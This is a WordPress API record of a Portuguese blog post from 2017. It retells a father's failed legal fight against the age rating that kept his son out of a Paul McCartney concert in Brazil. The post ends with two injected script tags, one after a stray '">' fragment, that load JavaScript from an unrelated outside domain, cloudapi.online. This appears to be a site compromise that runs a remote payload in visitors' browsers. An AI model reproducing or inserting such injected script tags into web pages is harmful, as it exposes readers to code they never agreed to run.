{"id":13262,"date":"2017-10-22T20:47:02","date_gmt":"2017-10-22T23:47:02","guid":{"rendered":"http:\/\/mapati.com.br\/?p=13262"},"modified":"2017-10-24T20:46:25","modified_gmt":"2017-10-24T23:46:25","slug":"hey-jude-iii","status":"publish","type":"post","link":"https:\/\/mapati.com.br\/blogmapati\/hey-jude-iii\/","title":{"rendered":"Hey Jude (III)"},"content":{"rendered":"<p style=\"text-align: right;\"><em>Vejo caminh\u00f5es e carros apressados a passar por mim\/<br \/>\nEstou sentado \u00e0 beira de um caminho que n\u00e3o tem mais fim\/<br \/>\nMeu olhar se perde na poeira dessa estrada triste&#8230;<\/em><\/p>\n<p style=\"text-align: right;\"><em>\u00a0<\/em><em>(<\/em><em>Sentado \u00e0 Beira do Caminho &#8211;\u00a0<a href=\"https:\/\/www.vagalume.com.br\/erasmo-carlos\/\" data-saferedirecturl=\"https:\/\/www.google.com\/url?hl=pt-BR&amp;q=https:\/\/www.vagalume.com.br\/erasmo-carlos\/&amp;source=gmail&amp;ust=1508801351005000&amp;usg=AFQjCNG4iEFDXDW2uvhJl_U6vukpLGO-lw\">Erasmo Carlos<\/a>)<\/em><\/p>\n<p>N\u00e3o seccionei o desabafo do pai gratuitamente. O intervalo servir\u00e1 para que todos e todas reflitamos mais acerca da atitude de um produtor internacional (mercen\u00e1rio?) albergado em alvar\u00e1 judicial lacunoso e, no meu sentir, refrat\u00e1rio aos postulados do Estatuto da Crian\u00e7a e do Adolescente, o pouco compreendido, mal interpretado e pessimamente aplicado ECA.<\/p>\n<p>Efetuado o teste atrav\u00e9s da mesa digital sofisticad\u00edssima para checar a qualidade dos microfones e das caixas de som, convoque-se novamente ao palco o zeloso e l\u00facido pai do garoto que ainda n\u00e3o viu (ver\u00e1? tamb\u00e9m \u00e9 minha d\u00favida) o Paul McCartney destro\u00e7ando cora\u00e7\u00f5es da plateia com m\u00fasicas (dele e daqueles outros tr\u00eas ingleses) que n\u00e3o ir\u00e3o morrer nunca, asseguro eu, de igual modo um menino, que neste 2017, segundo intriga da oposi\u00e7\u00e3o (mais leal que a base aliada), restei atingido pela\u00a0<em>When I&#8217;m Sixty-Four \u00a0<\/em>do c\u00e9lebre \u00e1lbum cinquenten\u00e1rio, verdadeira obra prima<em>.<\/em><\/p>\n<p>Sai Liverpool e entra uma cidade pr\u00f3xima de S\u00e3o Paulo<\/p>\n<p style=\"text-align: right;\"><em>\u201cA Vara de Jundia\u00ed, onde eu moro com as crian\u00e7as, n\u00e3o quis nem olhar meu calhama\u00e7o. Disse que a decis\u00e3o era do juiz de S\u00e3o Paulo e que o juiz da resid\u00eancia n\u00e3o afrontaria uma decis\u00e3o do magistrado do local do espet\u00e1culo, que certamente havia estudado com tanto cuidado as condi\u00e7\u00f5es do show.<\/em><\/p>\n<p style=\"text-align: right;\"><em>\u201cRefiz todo o meu calhama\u00e7o, colhi assinaturas todas de novo e fui para a cidade grande.<\/em><\/p>\n<p style=\"text-align: right;\"><em>\u201cBem, a Vara da Capital n\u00e3o quis nem olhar meu pedido. Mas o rapaz foi muito esclarecedor, mostrando que a portaria afixada nos cinemas n\u00e3o se aplica a shows, porque, neste caso, a quest\u00e3o n\u00e3o \u00e9 apenas de conte\u00fado, mas de estrutura do local.<\/em><\/p>\n<p style=\"text-align: right;\"><em>\u201c\u2018Mas isso faz menos sentido ainda\u2019 eu argumentei, com espanto leg\u00edtimo. \u2018Por que a classifica\u00e7\u00e3o para jogos de futebol, no mesmo hor\u00e1rio e no mesmo local do show, \u00e9 livre! Quer dizer que eu posso levar meu filho pra gritar \u2018Juiz ladr\u00e3o, porrada solu\u00e7\u00e3o\u2019 num Palmeiras x Corinthians e n\u00e3o posso levar para cantar \u2018Hey Jude\u2019?<\/em><\/p>\n<p style=\"text-align: right;\"><em>\u201cS\u00f3 conseguia me lembrar do inesquec\u00edvel Rogerinho do Ing\u00e1, o personagem do \u2018Choque de Cultura\u2019:<\/em><\/p>\n<p style=\"text-align: right;\"><em>\u201cO atendente da Vara da Inf\u00e2ncia encolheu os ombros e me mostrou o artigo 4 da Portaria 1.100 de 14 de julho de 2006: \u2018O produtor ou respons\u00e1vel pelas divers\u00f5es p\u00fablicas mencionadas neste artigo dever\u00e1 indicar os limites de idade a que n\u00e3o se recomendem\u2019 os shows e eventos do tipo.<\/em><\/p>\n<p style=\"text-align: right;\"><em>\u201cVoltei \u00e0 T4F, que continuou insistindo que n\u00e3o poderia abrir uma exce\u00e7\u00e3o, por for\u00e7a da lei. Pelo call-center, novamente me vendeu a vers\u00e3o de que o juiz da Vara da Inf\u00e2ncia estudara minuciosamente o conte\u00fado e o espa\u00e7o f\u00edsico dos shows e que eles nada poderiam fazer a respeito. Mas n\u00e3o soube me responder como, coincidentemente, todos os locais, do Beira Rio ao Allianz, do Mineir\u00e3o \u00e0 Fonte Nova, tiveram a mesm\u00edssima avalia\u00e7\u00e3o t\u00e9cnica para que se chegasse a classifica\u00e7\u00e3o et\u00e1ria.<\/em><\/p>\n<p style=\"text-align: right;\"><em>\u201c\u00c0quela altura, j\u00e1 pipocava a pol\u00eamica das crian\u00e7as no Queermuseu e no La B\u00eate, ao mesmo tempo que se multiplicavam as pautas de fam\u00edlias felizes no Rock in Rio, onde, aparentemente, os produtores ou respons\u00e1veis pelas divers\u00f5es p\u00fablicas indicaram um limite de idade menor a que n\u00e3o se recomendem.<\/em><\/p>\n<p style=\"text-align: right;\"><strong><em>\u201cOlha que feliz o Bernardo parece (nesta)foto, prestes a curtir um rock\u2019n\u2019roll com seus pais:<\/em><\/strong><\/p>\n<p><a href=\"http:\/\/mapati.com.br\/site\/wp-content\/uploads\/2017\/10\/Paul3.png\"><img fetchpriority=\"high\" decoding=\"async\" class=\"size-full wp-image-13263 aligncenter\" src=\"http:\/\/mapati.com.br\/site\/wp-content\/uploads\/2017\/10\/Paul3.png\" alt=\"\" width=\"424\" height=\"322\" srcset=\"https:\/\/mapati.com.br\/blogmapati\/wp-content\/uploads\/2017\/10\/Paul3.png 424w, https:\/\/mapati.com.br\/blogmapati\/wp-content\/uploads\/2017\/10\/Paul3-300x228.png 300w, https:\/\/mapati.com.br\/blogmapati\/wp-content\/uploads\/2017\/10\/Paul3-200x152.png 200w, https:\/\/mapati.com.br\/blogmapati\/wp-content\/uploads\/2017\/10\/Paul3-400x304.png 400w\" sizes=\"(max-width: 424px) 100vw, 424px\" \/><\/a><\/p>\n<p style=\"text-align: right;\"><em>\u201cCheguei a um segundo figur\u00e3o de dentro da produtora que, novamente, me recomendou que constitu\u00edsse um advogado e entrasse com uma liminar, como \u00fanica sa\u00edda para que eu n\u00e3o fosse barrado na catraca. Foi o que fiz. Minha \u00faltima curva.<\/em><\/p>\n<p style=\"text-align: right;\"><em>\u201cA resposta do Minist\u00e9rio P\u00fablico me deu vontade de sentar na cal\u00e7ada e chorar. Basicamente, a promotora de justi\u00e7a disse que, diante da preocupa\u00e7\u00e3o t\u00e3o grande da T4F com meu filho, n\u00e3o seria ela que \u201cobrigaria\u201d a produtora a cometer a imprud\u00eancia de colocar o garoto para dentro do show.<\/em><\/p>\n<p style=\"text-align: right;\"><em>\u201cEu n\u00e3o tenho nem palavras para agradecer tanta preocupa\u00e7\u00e3o.<\/em><\/p>\n<p style=\"text-align: right;\"><em>\u201c\u2018Expandir a estrutura\u2019 \u2013 em que mesa isso foi pedido?<\/em><\/p>\n<p style=\"text-align: right;\"><em>\u201cMinha jornada em busca de esclarecimento terminou na quarta-feira, 11 de outubro, v\u00e9spera do dia das crian\u00e7as, quando coloquei duas meia-entradas a venda, com a certeza de que a classifica\u00e7\u00e3o et\u00e1ria para shows \u00e9 um misto de arbitrariedade com os interesses dos produtores em limitar ou aumentar o acesso de meio-pagantes.<\/em><\/p>\n<p style=\"text-align: right;\"><em>\u201cFa\u00e7o votos de que Paul McCartney, 75 anos, se mantenha saud\u00e1vel e impec\u00e1vel por pelo menos mais dois aninhos, e volte ao Brasil assim que meu filho fa\u00e7a 10 anos. E tor\u00e7o ainda mais para que, em 2019, a T4F n\u00e3o meta a m\u00e3o na cartola e tire de l\u00e1 uma outra faixa et\u00e1ria que impe\u00e7a o garoto de assistir ao compositor de algumas de suas m\u00fasicas favoritas.&#8221;<\/em><\/p>\n<p>Chega ao seu t\u00e9rmino o \u201crelato\u201d, feito em 12 de outubro de 2017, pelo jornalista Ricardo Alexandre, pai do feliz\/infeliz Bernardo.<\/p>\n<p style=\"text-align: center;\"><b>\u00a0#<\/b>Rogerinho do Ing\u00e1 (Choque de Cultura)\u00a0 \u00a0 #When I&#8217;m Sixty-Four\u00a0 \u00a0 #Queermuseu<br \/>\n#La B\u00eate\u00a0 \u00a0 #Estatuto da crian\u00e7a e do adolescente (ECA)<\/p>\n<p style=\"text-align: right;\">22\/10\/2017<\/p>\n<p style=\"font-style: inherit; font-weight: inherit; text-align: right;\">(265)<\/p>\n<p style=\"font-style: inherit; font-weight: inherit; text-align: right;\"><a href=\"mailto:mmsmarcos1953@hotmail.com\">mmsmarcos1953@hotmail.com<\/a><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script>&#8220;&gt;<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vejo caminh\u00f5es e carros apressados a passar por mim\/ Estou sentado \u00e0 beira de um caminho que n\u00e3o tem mais fim\/ Meu olhar se perde na poeira dessa estrada triste&#8230; \u00a0(Sentado \u00e0 Beira do Caminho &#8211;\u00a0Erasmo Carlos) N\u00e3o seccionei o desabafo do pai gratuitamente. O intervalo servir\u00e1 para que todos e todas reflitamos mais acerca da atitude de um produtor internacional (mercen\u00e1rio?) albergado em alvar\u00e1 judicial lacunoso e, no meu sentir, refrat\u00e1rio aos postulados do Estatuto da Crian\u00e7a e do Adolescente, o pouco compreendido, mal interpretado e pessimamente aplicado ECA. Efetuado o teste atrav\u00e9s da mesa digital sofisticad\u00edssima para checar a qualidade dos microfones e das caixas de som, convoque-se novamente ao palco o zeloso e l\u00facido pai do garoto que ainda n\u00e3o viu (ver\u00e1? tamb\u00e9m \u00e9 minha d\u00favida) o Paul McCartney destro\u00e7ando cora\u00e7\u00f5es da plateia com m\u00fasicas (dele e daqueles outros tr\u00eas ingleses) que n\u00e3o ir\u00e3o morrer nunca, asseguro eu, de igual modo um menino, que neste 2017, segundo intriga da oposi\u00e7\u00e3o (mais leal que a base aliada), restei atingido pela\u00a0When I&#8217;m Sixty-Four \u00a0do c\u00e9lebre \u00e1lbum cinquenten\u00e1rio, verdadeira obra prima. Sai Liverpool e entra uma cidade pr\u00f3xima de S\u00e3o Paulo \u201cA Vara de Jundia\u00ed, onde eu moro com as crian\u00e7as, n\u00e3o quis nem olhar meu calhama\u00e7o. Disse que a decis\u00e3o era do juiz de S\u00e3o Paulo e que o juiz da resid\u00eancia n\u00e3o afrontaria uma decis\u00e3o do magistrado do local do espet\u00e1culo, que certamente havia estudado com tanto cuidado as condi\u00e7\u00f5es do show. \u201cRefiz todo o meu calhama\u00e7o, colhi assinaturas todas de novo e fui para a cidade grande. \u201cBem, a Vara da Capital n\u00e3o quis nem olhar meu pedido. Mas o rapaz foi muito esclarecedor, mostrando que a portaria afixada nos cinemas n\u00e3o se aplica a shows, porque, neste caso, a quest\u00e3o n\u00e3o \u00e9 apenas de conte\u00fado, mas de estrutura do local. \u201c\u2018Mas isso faz menos sentido ainda\u2019 eu argumentei, com espanto leg\u00edtimo. \u2018Por que a classifica\u00e7\u00e3o para jogos de futebol, no mesmo hor\u00e1rio e no mesmo local do show, \u00e9 livre! Quer dizer que eu posso levar meu filho pra gritar \u2018Juiz ladr\u00e3o, porrada solu\u00e7\u00e3o\u2019 num Palmeiras x Corinthians e n\u00e3o posso levar para cantar \u2018Hey Jude\u2019? \u201cS\u00f3 conseguia me lembrar do inesquec\u00edvel Rogerinho do Ing\u00e1, o personagem do \u2018Choque de Cultura\u2019: \u201cO atendente da Vara da Inf\u00e2ncia encolheu os ombros e me mostrou o artigo 4 da Portaria 1.100 de 14 de julho de 2006: \u2018O produtor ou respons\u00e1vel pelas divers\u00f5es p\u00fablicas mencionadas neste artigo dever\u00e1 indicar os limites de idade a que n\u00e3o se recomendem\u2019 os shows e eventos do tipo. \u201cVoltei \u00e0 T4F, que continuou insistindo que n\u00e3o poderia abrir uma exce\u00e7\u00e3o, por for\u00e7a da lei. Pelo call-center, novamente me vendeu a vers\u00e3o de que o juiz da Vara da Inf\u00e2ncia estudara minuciosamente o conte\u00fado e o espa\u00e7o f\u00edsico dos shows e que eles nada poderiam fazer a respeito. Mas n\u00e3o soube me responder como, coincidentemente, todos os locais, do Beira Rio ao Allianz, do Mineir\u00e3o \u00e0 Fonte Nova, tiveram a mesm\u00edssima avalia\u00e7\u00e3o t\u00e9cnica para que se chegasse a classifica\u00e7\u00e3o et\u00e1ria. \u201c\u00c0quela altura, j\u00e1 pipocava a pol\u00eamica das crian\u00e7as no Queermuseu e no La B\u00eate, ao mesmo tempo que se multiplicavam as pautas de fam\u00edlias felizes no Rock in Rio, onde, aparentemente, os produtores ou respons\u00e1veis pelas divers\u00f5es p\u00fablicas indicaram um limite de idade menor a que n\u00e3o se recomendem. \u201cOlha que feliz o Bernardo parece (nesta)foto, prestes a curtir um rock\u2019n\u2019roll com seus pais: \u201cCheguei a um segundo figur\u00e3o de dentro da produtora que, novamente, me recomendou que constitu\u00edsse um advogado e entrasse com uma liminar, como \u00fanica sa\u00edda para que eu n\u00e3o fosse barrado na catraca. Foi o que fiz. Minha \u00faltima curva. \u201cA resposta do Minist\u00e9rio P\u00fablico me deu vontade de sentar na cal\u00e7ada e chorar. Basicamente, a promotora de justi\u00e7a disse que, diante da preocupa\u00e7\u00e3o t\u00e3o grande da T4F com meu filho, n\u00e3o seria ela que \u201cobrigaria\u201d a produtora a cometer a imprud\u00eancia de colocar o garoto para dentro do show. \u201cEu n\u00e3o tenho nem palavras para agradecer tanta preocupa\u00e7\u00e3o. \u201c\u2018Expandir a estrutura\u2019 \u2013 em que mesa isso foi pedido? \u201cMinha jornada em busca de esclarecimento terminou na quarta-feira, 11 de outubro, v\u00e9spera do dia das crian\u00e7as, quando coloquei duas meia-entradas a venda, com a certeza de que a classifica\u00e7\u00e3o et\u00e1ria para shows \u00e9 um misto de arbitrariedade com os interesses dos produtores em limitar ou aumentar o acesso de meio-pagantes. \u201cFa\u00e7o votos de que Paul McCartney, 75 anos, se mantenha saud\u00e1vel e impec\u00e1vel por pelo menos mais dois aninhos, e volte ao Brasil assim que meu filho fa\u00e7a 10 anos. E tor\u00e7o ainda mais para que, em 2019, a T4F n\u00e3o meta a m\u00e3o na cartola e tire de l\u00e1 uma outra faixa et\u00e1ria que impe\u00e7a o garoto de assistir ao compositor de algumas de suas m\u00fasicas favoritas.&#8221; Chega ao seu t\u00e9rmino o \u201crelato\u201d, feito em 12 de outubro de 2017, pelo jornalista Ricardo Alexandre, pai do feliz\/infeliz Bernardo. \u00a0#Rogerinho do Ing\u00e1 (Choque de Cultura)\u00a0 \u00a0 #When I&#8217;m Sixty-Four\u00a0 \u00a0 #Queermuseu #La B\u00eate\u00a0 \u00a0 #Estatuto da crian\u00e7a e do adolescente (ECA) 22\/10\/2017 (265) mmsmarcos1953@hotmail.com &#8220;&gt;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-13262","post","type-post","status-publish","format-standard","hentry","category-sem-categoria"],"_links":{"self":[{"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/posts\/13262","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/comments?post=13262"}],"version-history":[{"count":8,"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/posts\/13262\/revisions"}],"predecessor-version":[{"id":13278,"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/posts\/13262\/revisions\/13278"}],"wp:attachment":[{"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/media?parent=13262"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/categories?post=13262"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mapati.com.br\/blogmapati\/wp-json\/wp\/v2\/tags?post=13262"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}